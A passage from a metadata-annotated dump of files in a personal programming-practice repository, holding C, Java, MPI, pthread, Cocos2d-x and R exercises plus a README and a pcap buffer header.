%d %d %d\", &a[i].n, &a[i].math, &a[i].english, &a[i].C);\n a[i].total = a[i].n + a[i].math + a[i].english + a[i].C;\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.26337793469429016, "alphanum_fraction": 0.29933109879493713, "avg_line_length": 17.984127044677734, "blob_id": "a07bfd31288ea0530dde26dba96d4ccf57390683", "content_id": "822f0a3f2348c1c544ee857c91587d4d23afc4ea", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1196, "license_type": "permissive", "max_line_length": 58, "num_lines": 63, "path": "/c/hardwork/hardway/1.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/*\n\nI don't know what is use for... orz\n\n\n*/\n#include <stdio.h>\n\nlong int a[500005];\n\nint main() {\n int t = 0;\n int z = 0;\n long int x = 0;\n long int y = 0;\n\n long int x0 = 0;\n long int y0 = 0;\n\n long int n = 0;\n long int m = 0;\n long int _x = 0;\n scanf(\"%d\", &t);\n for (int _t = 0; _t < t; _t++) {\n scanf(\"%ld %ld\", &n, &m);\n for (int _n = 1; _n <= n; _n++) a[_n] = _n;\n for (int _m = 0; _m < m; _m++) {\n scanf(\"%d %ld %ld\", &z, &x0, &y0);\n for (int i = 1; i <= n; i++) {\n if (x0 == a[i]) x = i;\n if (y0 == a[i]) y = i;\n }\n if (x < y) {\n for (int i = x; i <= y - 2; i++) {\n a[i] = a[i + 1];\n }\n if (1 == z) {\n a[y - 1] = x0;\n a[y] = a[y];\n }\n if (2 == z) {\n a[y - 1] = a[y];\n a[y] = x0;\n }\n } else {\n for (int i = x; i >= y + 2; i--) {\n a[i] = a[i - 1];\n }\n if (1 == z) {\n a[y + 1] = a[y];\n a[y] = x0;\n }\n if (2 == z) {\n a[y + 1] = x0;\n a[y] = a[y];\n }\n }\n }\n for (int _n = 1; _n <= n; _n++) printf(\"%ld \", a[_n]);\n printf(\"\\n\");\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.6083788871765137, "alphanum_fraction": 0.619307816028595, "avg_line_length": 18.60714340209961, "blob_id": "167b22a645ac67cd9f77328c956f90e30b5fc5ad", "content_id": "26716291782140c085148184896b81d27062211f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, 
"language": "C", "length_bytes": 643, "license_type": "permissive", "max_line_length": 83, "num_lines": 28, "path": "/c/projects/MPI/hardway/MPI_reduce.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 对于数据做同一种操作,并将结果返回到指定的进程中,这个过程称为集合通信。\n\n#include <stdio.h>\n#include <mpi.h>\n\nint main(int argc, char **argv)\n{\n\tint myid, numprocs;\n\tdouble local_num = 3.0; \n\n\tMPI_Init(&argc, &argv);\n\t\n\tMPI_Comm_rank(MPI_COMM_WORLD, &myid);\n\tMPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n \n double global_num;\n \n // 强烈安利使用linux 毕竟有补全\n MPI_Reduce(&local_num, &global_num, 1, MPI_DOUBLE, MPI_SUM, 0, MPI_COMM_WORLD);\n\n \n if(myid == 0) {\n \tprintf(\"Total sum = %f, avg = %f\\n\", global_num, global_num / numprocs);\n\t}\n\n\tMPI_Finalize();\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.5972222089767456, "alphanum_fraction": 0.5987654328346252, "avg_line_length": 26.02083396911621, "blob_id": "f3f889b40cc2383f5ad630014ef790d801f38857", "content_id": "8bdc288414cd4ab1467b10eb2092cf5cb8edb973", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Ant Build System", "length_bytes": 1296, "license_type": "permissive", "max_line_length": 73, "num_lines": 48, "path": "/java/hardwork/junit/build.xml", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "<project name=\"Hello\">\n\n<path id=\"classpath\">\n\t<pathelement location=\"junit-4.9.jar\" />\n</path>\n\n\t<target name=\"compile\">\n\t\t<javac srcdir=\".\" destdir=\".\" includeantruntime=\"false\"/>\n\t\t<classpath refid=\"classpath\"/>\n\t</target>\n\n\t<target name=\"test-compile\" depends=\"compile\">\n\t\t<javac srcdir=\".\" destdir=\".\" includeantruntime=\"false\">\n\t\t\t<classpath refid=\"classpath\"/>\n\t\t</javac>\n\t</target>\n\n\t<target name=\"test\" depends=\"test-compile\">\n\t\t<junit printsummary=\"on\" haltonfailure=\"yes\" fork=\"true\">\n\t\t\t<classpath>\n\t\t\t\t<path refid=\"classpath\"/>\n\t\t\t\t<pathelement 
location=\".\" />\n\t\t\t</classpath>\n\t\t\t<formatter type=\"brief\" usefile=\"false\" />\n\t\t\t<batchtest>\n\t\t\t\t<fileset dir=\".\" includes=\".\"/>\n\t\t\t</batchtest>\t\n\t\t</junit>\n\t</target>\n\n\t<target name=\"jar\">\n <jar destfile=\"${ant.project.name}.text.jar\" basedir=\".\">\n <manifest>\n <attribute name=\"Main-Class\" value=\"HelloWorldTest\"/>\n </manifest>\n </jar>\n </target>\n \n <target name=\"run\" description=\"run app\" depends=\"test-compile, jar\">\n <java jar=\"${ant.project.name}.text.jar\" fork=\"true\">\n \t<arg value=\"-ea org.junit.runner.JUnitCore\"/>\n \t<classpath>\n\t\t\t\t<path refid=\"classpath\"/>\n\t\t\t\t<pathelement location=\".\" />\n\t\t\t</classpath>\n </java>\n </target>\n</project>" }, { "alpha_fraction": 0.6157205104827881, "alphanum_fraction": 0.6157205104827881, "avg_line_length": 11.777777671813965, "blob_id": "629bf456520a99532936d21f09041abff60abbd2", "content_id": "1095ede57ada8d29ea2039a4519dc37a494f6cab", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 229, "license_type": "permissive", "max_line_length": 42, "num_lines": 18, "path": "/java/projects/gridworld/docs/Final_Part1/src/HelloWorld.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "public class HelloWorld\n{\n\tString str;\n\n\tpublic static void main(String[] args) {\n System.out.println(\"Hello world\");\n }\n\n\tpublic void hello()\n\t{\n\t\tstr = \"Hello World!\";\n\t}\n\n\tpublic String getStr()\n\t{\n\t\treturn str;\n\t}\n}" }, { "alpha_fraction": 0.6245551705360413, "alphanum_fraction": 0.6334519386291504, "avg_line_length": 29.37837791442871, "blob_id": "6cce68c52bbaa90ebb423461d391ce1a6ac85fad", "content_id": "0c954237b2bd51b8d7a42f94607238bafe22e594", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1124, "license_type": "permissive", "max_line_length": 93, "num_lines": 37, "path": 
"/java/projects/algorithms/chapter1/part1/Q15.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "\n/**\n * Q15\n */\n\nimport java.util.Scanner;\nimport java.util.ArrayList;\nimport java.util.Arrays;\n\npublic class Q15 {\n public static void main(String[] args) {\n Scanner scanner = new Scanner(System.in);\n int intputArraySize = 0, outputArraySize = 0;\n if (scanner.hasNextInt())\n outputArraySize = scanner.nextInt();\n if (scanner.hasNextInt())\n intputArraySize = scanner.nextInt();\n int[] inputArray = new int[intputArraySize];\n for (int i = 0; i < inputArray.length && scanner.hasNextInt(); i++)\n inputArray[i] = scanner.nextInt();\n\n int[] outputArray = histogram(inputArray, intputArraySize, outputArraySize);\n for (int i = 0; i < outputArray.length; i++)\n System.out.printf(\"index: %d times: %d\\n\", i, outputArray[i]);\n\n scanner.close();\n }\n\n public static int[] histogram(int[] inputArray, int intputArraySize, int outputArraySize) {\n int[] outputArray = new int[outputArraySize];\n Arrays.stream(inputArray)\n .forEach((x) -> {\n if (x >=0 && x < outputArray.length)\n outputArray[(int)x] += 1;\n });\n return outputArray;\n }\n}" }, { "alpha_fraction": 0.4005376398563385, "alphanum_fraction": 0.4448924660682678, "avg_line_length": 22.25, "blob_id": "70dfb186d6da7b7b8d6fb97e3a996d92378979e1", "content_id": "62b8731066eaab64b7f0bd90eb174965f6509c60", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 744, "license_type": "permissive", "max_line_length": 52, "num_lines": 32, "path": "/c/hardwork/hardway/sort(select).c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nvoid bubbleSort(double list[], int size) {\n double temp;\n for (int i = 0; i < size - 1; i++) {\n for (int j = 0; j < size - 1; j++) {\n if (list[j] > list[j + 1]) {\n temp = list[j];\n list[j] = list[j + 1];\n list[j + 1] = temp;\n }\n }\n }\n}\nvoid 
selectionSort(double list[], int arraySize) {\n double temp;\n for (int i = 0; i < arraySize - 1; i++) {\n for (int j = 0; j < arraySize - 1; j++) {\n if (list[j] > list[j + 1]) {\n temp = list[j];\n list[j] = list[j + 1];\n list[j + 1] = temp;\n }\n }\n }\n}\nint main() {\n double a[10] = {1, 3, 4, 5, 6, 2, 7, 8, 9, 10};\n selectionSort(a, 10);\n for (int i = 0; i < 10; i++) printf(\"%lf \", a[i]);\n return 0;\n}\n" }, { "alpha_fraction": 0.5098039507865906, "alphanum_fraction": 0.5196078419685364, "avg_line_length": 11.75, "blob_id": "1772a4771fe8ddc3af8a6d298e315983e81c5f72", "content_id": "52cc124a204f872b5cf866b16710d03e65c3d432", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 102, "license_type": "permissive", "max_line_length": 19, "num_lines": 8, "path": "/c/hardwork/hardway/short_int_print.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint main() {\n short int i;\n scanf(\"%hd\", &i);\n printf(\"%hd\", i);\n return 0;\n}\n" }, { "alpha_fraction": 0.6981085538864136, "alphanum_fraction": 0.7157946228981018, "avg_line_length": 31.309524536132812, "blob_id": "0da0fe518791ca59f1cd4f5be629ef2f214dcfb4", "content_id": "c0803982738c06ed932c6d237d8d54ab5d3713bc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4073, "license_type": "permissive", "max_line_length": 103, "num_lines": 126, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week10/Classes/GameSence.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include \"GameSence.h\"\n\nUSING_NS_CC;\n\nScene* GameSence::createScene()\n{\n\t// 'scene' is an autorelease object\n\tauto scene = Scene::create();\n\n\t// 'layer' is an autorelease object\n\tauto layer = GameSence::create();\n\n\t// add layer as a child to scene\n\tscene->addChild(layer);\n\n\t// return the scene\n\treturn scene;\n}\n\n// on \"init\" you 
need to initialize your instance\nbool GameSence::init()\n{\n\n\tif (!Layer::init())\n\t{\n\t\treturn false;\n\t}\n\n\t//add touch listener\n\tEventListenerTouchOneByOne* listener = EventListenerTouchOneByOne::create();\n\tlistener->setSwallowTouches(true);\n\tlistener->onTouchBegan = CC_CALLBACK_2(GameSence::onTouchBegan, this);\n\tDirector::getInstance()->getEventDispatcher()->addEventListenerWithSceneGraphPriority(listener, this);\n\n\n\tSize visibleSize = Director::getInstance()->getVisibleSize();\n\tVec2 origin = Director::getInstance()->getVisibleOrigin();\n\n\tauto bg = Sprite::create(\"level-background-0.jpg\");\n\tbg->setPosition(Vec2(visibleSize.width / 2 + origin.x, visibleSize.height / 2 + origin.y));\n\tthis->addChild(bg, 0);\n\n\tauto stoneLayer = Layer::create();\n\tstoneLayer->setName(\"stoneLayer\");\n\tauto stone = Sprite::create(\"stone.png\");\n\tstone->setPosition(560, 480);\n\tstone->setName(\"stone\");\n\tauto cheese = Sprite::create(\"cheese.png\");\n\tcheese->setName(\"cheese\");\n\tcheese->setVisible(false);\n\tstoneLayer->addChild(cheese);\n\tstoneLayer->addChild(stone);\n\tthis->addChild(stoneLayer, 1);\n\n\tauto mouseLayer = Layer::create();\n\tmouseLayer->setName(\"mouseLayer\");\n\tauto mouse = Sprite::createWithSpriteFrameName(\"mouse-0.png\");\n\tmouse->setName(\"mouse\");\n\tAnimate* legAnimate = Animate::create(AnimationCache::getInstance()->getAnimation(\"mouseAnimation\"));\n\tmouse->runAction(RepeatForever::create(legAnimate));\n\tmouse->setPosition(origin.x + visibleSize.width / 2, origin.y + visibleSize.height / 2);\n\tmouseLayer->addChild(mouse);\n\tthis->addChild(mouseLayer, 1);\n\t\n\n\tauto label = Label::createWithTTF(\"Shoot\", \"fonts/arial.ttf\", 48);\n\tlabel->setName(\"shoot\");\n\tlabel->setPosition(Vec2(origin.x + visibleSize.width - label->getContentSize().width,\n\t\torigin.y + visibleSize.height - label->getContentSize().height));\n\tthis->addChild(label, 1);\n\n\n\treturn true;\n}\n\nbool 
GameSence::onTouchBegan(Touch *touch, Event *unused_event) {\n\n\tauto location = touch->getLocation();\n\t\n\tauto stoneLayer = this->getChildByName(\"stoneLayer\");\n\tauto mouseLayer = this->getChildByName(\"mouseLayer\");\n\tauto cheese = stoneLayer->getChildByName(\"cheese\");\n\tauto mouse = mouseLayer->getChildByName(\"mouse\");\n\tauto stone = stoneLayer->getChildByName(\"stone\");\n\tauto shoot = this->getChildByName(\"shoot\");\n\tRect rect = Rect(0, 0,\n\t\t\t\t\t shoot->getContentSize().width, shoot->getContentSize().height);\n\tif (rect.containsPoint(shoot->convertToNodeSpace(location))) {\n\t\tauto diamond = Sprite::create(\"diamond.png\");\n\t\tdiamond->setPosition(mouse->getPosition());\n\t\tstoneLayer->addChild(diamond);\n\n\t\tstone->cleanup();\n\t\tauto moveto = MoveTo::create(0.5, mouse->getPosition());\n\t\tauto fadein = FadeIn::create(0.5f);\n\t\tauto moveback = MoveTo::create(0.001f, Vec2(560, 480));\n\t\tauto fadeout = FadeOut::create(0.001f);\n\t\tauto seq0 = Sequence::create(moveto, fadeout, moveback, fadein, nullptr);\n\t\tstone->runAction(seq0);\n\n\t\tmouse->cleanup();\n\t\tfloat positionX = CCRANDOM_0_1() * Director::getInstance()->getVisibleSize().width;\n\t\tfloat positionY = CCRANDOM_0_1() * Director::getInstance()->getVisibleSize().height;\n\t\tauto randomMove = MoveTo::create(0.5, Vec2(positionX, positionY));\n\t\tmouse->runAction(randomMove);\n\t}\n\telse {\n\t\tcheese->cleanup();\n\t\tcheese->setPosition(location);\n\t\tcheese->setVisible(true);\n\t\tauto fadein = FadeIn::create(0.001f);\n\t\tauto delay = DelayTime::create(0.5);\n\t\tauto fadeout = FadeOut::create(0.001f);\n\t\tauto seq0 = Sequence::create(fadein, delay, fadeout,nullptr);\n\t\tcheese->runAction(seq0);\n\t\t\n\t\tmouse->cleanup();\n\t\tauto rotate = RotateBy::create(0.25, 360);\n\t\tauto moveto = MoveTo::create(0.5, location);\n\t\tauto action = Spawn::createWithTwoActions(moveto, rotate);\n\t\tauto seq = Sequence::create(action, 
nullptr);\n\t\tmouse->runAction(seq);\n\t}\n\n\treturn true;\n}\n" }, { "alpha_fraction": 0.53721684217453, "alphanum_fraction": 0.5760517716407776, "avg_line_length": 8.6875, "blob_id": "b4d34b04329d1bb504ede3d11ea0d46e6010a937", "content_id": "46c17cf8bd6b30f73a18bf468009b6a6c35e6500", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 405, "license_type": "permissive", "max_line_length": 36, "num_lines": 32, "path": "/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Languages\n`jskyzero` `2016/10/30`\n\n## Overview\n\nUse Program do things more efficient\n\n## Structure\n```shell\n+ \n.\n├── LICENSE\n├── R\n├── README.md\n├── bash\n├── c\n├── cplusplus\n├── csharp\n├── docs\n├── haskell\n├── java\n├── perl\n├── powershell\n├── python27\n├── python36\n├── scheme\n└── vala\n```\n\n## Reference\n\n..." }, { "alpha_fraction": 0.660764217376709, "alphanum_fraction": 0.6747437119483948, "avg_line_length": 27.263158798217773, "blob_id": "6235ca5ffaf103311377105c2513c4bfb552930a", "content_id": "af911d586a897dec6a974237ce8fbcff7fc59f30", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1161, "license_type": "permissive", "max_line_length": 87, "num_lines": 38, "path": "/c/projects/MPI/hardway/MPI_group_operation.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 对于两个集合,我们经常对其进行各种各样的集合操作,例如交/并。\n// MPI同样提供了对组的集合类操作。\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs, union_rank;\n MPI_Group group_world, odd_group, even_group, union_group;\n int i;\n int members[10];\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n\n for (i = 0; i < numprocs / 2; i++) {\n members[i] = 2 * i + 1;\n }\n\n MPI_Group_incl(group_world, numprocs / 2, 
members, &odd_group);\n MPI_Group_excl(group_world, numprocs / 2, members, &even_group);\n\n // int MPI_Group_union(MPI_Group group1, MPI_Group group2, MPI_Group *newgroup)\n // int MPI_Group_intersection(MPI_Group group1,MPI_Group group2,MPI_Group *newgroup) \n // int MPI_Group_difference(MPI_Group group1,MPI_Group group2,MPI_Group *newgroup)\n MPI_Group_union(odd_group, even_group, &union_group);\n\n MPI_Group_rank(union_group, &union_rank);\n\n printf(\"In process %d: union rank is %d\\n\", myid, union_rank);\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.5962587594985962, "alphanum_fraction": 0.6024941802024841, "avg_line_length": 26.29787254333496, "blob_id": "66032dd0c8c81fadd3cd2e2c8a64347b6519db86", "content_id": "92b3932fc69e51dd4ff4c81d6245e4d2bf505bce", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1295, "license_type": "permissive", "max_line_length": 82, "num_lines": 47, "path": "/c/projects/POSIX/Lab2/2.0.helloworld.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <pthread.h> // for pthread_*, thread_*\n#include <assert.h> // for assert()\n\n// \nvoid* pthread_work(void* arguement) {\n // use type cast to get data from arguement\n char* print_str = (char*)arguement;\n // process data\n printf(\"%s\\n\", print_str);\n\n\n return NULL;\n}\n\nint main(int argc, char *argv[]) {\n pthread_t thread;\n pthread_attr_t attr;\n char thread_argument[] = \"Hello World!\"; \n pthread_attr_init(&attr);\n\n // Attention :\n // this will cause a abort in my macOS Sierra 10.12.02\n // I dont know why it can't set scope to process\n // Update: linux / Mac OS X 仅允许设置PTHREAD SCOPE SYSTEM。\n // assert(pthread_attr_setscope(&attr, PTHREAD_SCOPE_PROCESS) == 0 );\n\n // int s, i;\n // s = pthread_attr_getscope(&attr, &i);\n\n // printf(\"%sScope = %s\\n\", \"|\",\n // (i == PTHREAD_SCOPE_SYSTEM) ? 
\"PTHREAD_SCOPE_SYSTEM\" :\n // (i == PTHREAD_SCOPE_PROCESS) ? \"PTHREAD_SCOPE_PROCESS\" :\n // \"???\");\n\n // Create pthread\n int result_code = pthread_create(&thread, &attr, pthread_work, thread_argument);\n \n // printf(\"result code = %d\\n\", result_code);\n\n printf(\"In Main All threads completed\\n\");\n // block call \n // pthread_join(thread, NULL);\n // printf(\"Exit\\n\");\n \n return 0;\n}\n" }, { "alpha_fraction": 0.4146341383457184, "alphanum_fraction": 0.4451219439506531, "avg_line_length": 18.294116973876953, "blob_id": "6450fa0c407cba1a18b557a9eb9a266b26b2ee60", "content_id": "2be0141b5f98f8f3e4b6ea3cb43fab88fb4572e5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 328, "license_type": "permissive", "max_line_length": 40, "num_lines": 17, "path": "/c/projects/POSIX/Lab1/1.2.2.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void) {\n int i, a = 0;\n pid_t pid[2];\n for (i = 0; i < 2; i++) {\n if ((pid[i] = fork())) a = 1;\n // fork();\n // printf(\"X\");\n printf(\"X\\n\");\n }\n // if (pid[0] == 0) printf(\"%d\\n\", a);\n // if (pid[1] == 0) printf(\"%d\\n\", a);\n return 0;\n}\n" }, { "alpha_fraction": 0.6767764091491699, "alphanum_fraction": 0.6819757223129272, "avg_line_length": 25.227272033691406, "blob_id": "d6408766954214d49e35b1fa715c6c4bbb7dd246", "content_id": "379abae00293e46cc9568ca19e5e3431dd85167d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1154, "license_type": "permissive", "max_line_length": 74, "num_lines": 44, "path": "/c/projects/sniff/buffer.h", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#ifndef __BUFFER_H\n#define __BUFFER_H\n\n#include <pcap.h>\n#include <stdlib.h>\n#include <string.h>\n\n#define DEFAULT_CAPACITY 65536\n#define GARBAGE_SIZE (DEFAULT_CAPACITY / 2)\n/* an 
item in buffer contains packet header\n * and the full packet with additional info\n */\ntypedef struct __item {\n struct pcap_pkthdr* packet_header;\n u_char* full_packet;\n short int garbage; /* marked for collection */\n struct __item* prev; /* item in front */\n struct __item* next; /* next item */\n\n} item;\n\n/* buffer contains a doubly-linked list of items\n * and additional info\n */\ntypedef struct __buffer {\n long long int items; /* number of items currently in the list */\n long long int capacity; /* maximum capacity */\n long long int garbage_size; /* collect garbage when we hit this limit */\n\n item* header; /* head of the list */\n item* tail; /* tail of the list */\n\n} buffer;\n\n/* initialize the buffer */\nint create_buffer(buffer*, long long int, long long int);\n\n/* insert an item into the buffer */\nint append_item(buffer*, const struct pcap_pkthdr*, const u_char*);\n\n/* run garbage collection returns freed items */\nint gc(buffer*);\n\n#endif\n" }, { "alpha_fraction": 0.432110995054245, "alphanum_fraction": 0.47274529933929443, "avg_line_length": 26.97222137451172, "blob_id": "0f10ed86eabfe7df4236fd9c16549da7689ecee5", "content_id": "b23d0570e32bda86ae37106c8e2bfe797025aaae", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1009, "license_type": "permissive", "max_line_length": 64, "num_lines": 36, "path": "/c/hardwork/hardway/_two_dimension_array.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <assert.h> // for assert()\n\n\ntypedef int(*Array_Type)[4];\n\nvoid print_two_dimension_array(int(*array)[4], int array_size) {\n for (int i = 0; i < array_size; i++) {\n printf(\"%p-%ld\\n\", array[i], sizeof(array[i]));\n }\n printf(\"\\n\");\n}\n\nvoid print_two_dimension_pointer(int **array, int array_size) {\n for (int i = 0; i < array_size; i++) {\n printf(\"%p-%ld\\n\", array[i], sizeof(array[i]));\n }\n 
printf(\"\\n\");\n}\n\nint main() {\n int a[3][4] = {{1, 2}, {3, 4}, {5, 6, 7}};\n print_two_dimension_array(a, 3);\n print_two_dimension_pointer(a, 3);\n // this means a[m][n] == *(*(a + m) + n)\n // assert(a[0][1] == *(*(a + 0) + 1));\n printf(\"&a = %p\\n\", &a);\n printf(\"a = %p\\n\", a);\n printf(\"a[0] = %p\\n\", a[0]);\n printf(\"&a[0][0] = %p\\n\", &a[0][0]);\n printf(\"&a[0][1] = %p\\n\", &a[0][1]);\n printf(\"&a[0][2] = %p\\n\", &a[0][2]);\n printf(\"a + 1 = %p\\n\", a + 1);\n printf(\"a[1] = %p\\n\", a[1]);\n printf(\"&a[1][0] = %p\\n\", &a[1][0]);\n}\n\n\n" }, { "alpha_fraction": 0.4783715009689331, "alphanum_fraction": 0.5182358026504517, "avg_line_length": 22.117647171020508, "blob_id": "2f4860ffc3b9093602df919f9c0003876ef80d80", "content_id": "fc6aabb5de49c236de51530f3455b9563e032274", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1191, "license_type": "permissive", "max_line_length": 83, "num_lines": 51, "path": "/java/projects/algorithms/chapter1/part1/Q27.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q27\n */\nimport java.util.Map;\n\npublic class Q27 {\n public static void main(String[] args) {\n // binomial(100, 50, 0.25)\n // 调用次数 2 ^ 100 以上\n }\n\n public static double binomial(int N, int k, double p) {\n if (N == 0 && k == 0)\n return 1.0;\n if (N < 0 && k < 0)\n return 0.0;\n return (1.0 - p) * binomial(N - 1, k, p) + p * binomial(N - 1, k - 1, p);\n }\n\n public static double binomial(int N, int k, double p, Map<Index, Double> cache) {\n if (N == 0 && k == 0)\n return 1.0;\n if (N < 0 && k < 0)\n return 0.0;\n double left = 0, right = 0;\n Index leftKey = new Index(N - 1, k);\n if (cache.containsKey(leftKey)) {\n left = cache.get(leftKey).doubleValue();\n } else {\n left = binomial(N - 1, k, p, cache);\n cache.put(leftKey, left);\n }\n Index rightKey = new Index(N - 1, k -1);\n if (cache.containsKey(rightKey)) {\n right = 
cache.get(rightKey).doubleValue();\n } else {\n right = binomial(N - 1, k - 1, p, cache);\n cache.put(rightKey, right);\n }\n\n return (1.0 - p) * left + p * right;\n }\n}\n\nclass Index {\n int x, y;\n Index(int x, int y) {\n this.x = x;\n this.y = y;\n }\n}\n" }, { "alpha_fraction": 0.39182692766189575, "alphanum_fraction": 0.41826921701431274, "avg_line_length": 15.640000343322754, "blob_id": "151d774708bf433bff066a2d64f0993389959e33", "content_id": "e8602f8f218909dc922fd703c21cd0d4bfc48979", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 416, "license_type": "permissive", "max_line_length": 43, "num_lines": 25, "path": "/c/hardwork/hardway/3.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint a[500005];\nint n, m, z, x, y, t;\n\nvoid dodo(int n, int m) {\n for (int i = 0; i < n; i++) a[i] = i + 1;\n while (m--) {\n scanf(\"%d %d %d\", &z, &x, &y);\n }\n int index = a[0];\n for (int i = 0; i < n; i++) {\n printf(\"%d \", index);\n index = a[index];\n }\n putchar('\\n');\n}\n\nint main() {\n scanf(\"%d\", &t);\n while (t--) {\n scanf(\"%d %d\", &n, &m);\n dodo(n, m);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.682539701461792, "alphanum_fraction": 0.682539701461792, "avg_line_length": 11.800000190734863, "blob_id": "71e656874f98235c180eecb4f019dcd1131c66bb", "content_id": "5a97abc06866e303a09083a598f5f0e3368b031d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 63, "license_type": "permissive", "max_line_length": 30, "num_lines": 5, "path": "/R/harwork/hardway/helloworld.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# HelloWorld In R\n\nm_str <- \"Mesekovic is lovely\"\n\nprint(m_str)" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.542553186416626, "avg_line_length": 14.666666984558105, "blob_id": "3b74ed4bfb9733564158fe413866e88910b6dced", "content_id": 
"b359fe804a8784af445d61d97642468ef5a3c92d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 94, "license_type": "permissive", "max_line_length": 28, "num_lines": 6, "path": "/c/hardwork/hardway/register_const.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main() {\n register const int i = 10;\n i = 11;\n printf(\"%d\\n\", i);\n}\n" }, { "alpha_fraction": 0.5643564462661743, "alphanum_fraction": 0.5841584205627441, "avg_line_length": 16.545454025268555, "blob_id": "a66040f5520bebac8cd580b1717666b8c89a20da", "content_id": "2116d86c46ad7740dcdf7c9eb34482b19a39464b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 202, "license_type": "permissive", "max_line_length": 50, "num_lines": 11, "path": "/c/hardwork/library/string/strlen.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n#include <string.h>\r\n\r\nint main() {\r\n\r\n int array[] = {1, 2, 3};\r\n // maybe will cause stackoverflow, but who cares\r\n printf(\"%lu\", strlen((char const *)array));\r\n\r\n return 0;\r\n}" }, { "alpha_fraction": 0.3407934904098511, "alphanum_fraction": 0.3502882421016693, "avg_line_length": 39.39725875854492, "blob_id": "d3ef50db3ec0af7d711a39706e6f033e3855674f", "content_id": "6dbb7075d799374ad45a527ebdc6a62bbcf53227", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2949, "license_type": "permissive", "max_line_length": 60, "num_lines": 73, "path": "/c/hardwork/hardway/strcmp.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() printf()\n#include <string.h> // fot strcmp()\n\nchar s0[30], c0[30];\nint main() {\n char a[49][2][30] = {{\"Alabama\", \"Montgomery\"},\n {\"Alaska\", \"Juneau\"},\n {\"Arizona\", \"Phoenix\"},\n {\"Arkansas\", \"Little Rock\"},\n 
